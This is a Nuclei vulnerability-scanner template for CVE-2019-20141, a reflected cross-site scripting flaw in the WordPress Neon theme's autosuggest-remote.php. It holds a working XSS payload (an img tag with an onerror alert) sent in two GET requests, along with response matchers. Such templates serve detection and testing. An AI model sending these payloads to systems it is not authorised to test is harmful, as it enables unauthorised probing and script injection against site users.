nuclei-templates/cves/2019/CVE-2019-20141.yaml

39 lines
1.2 KiB
YAML

id: CVE-2019-20141
info:
name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
author: knassar702
severity: medium
description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
reference:
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
- https://knassar702.github.io/cve/neon/
- https://nvd.nist.gov/vuln/detail/CVE-2019-20141
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-20141
cwe-id: CWE-79
tags: cve,cve2019,xss
requests:
- method: GET
path:
- '{{BaseURL}}/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>'
- '{{BaseURL}}/admin/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>'
matchers-condition: and
matchers:
- type: word
words:
- "><img src=x onerror=alert(1)>>)1(trela=rorreno"
part: body
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/08/31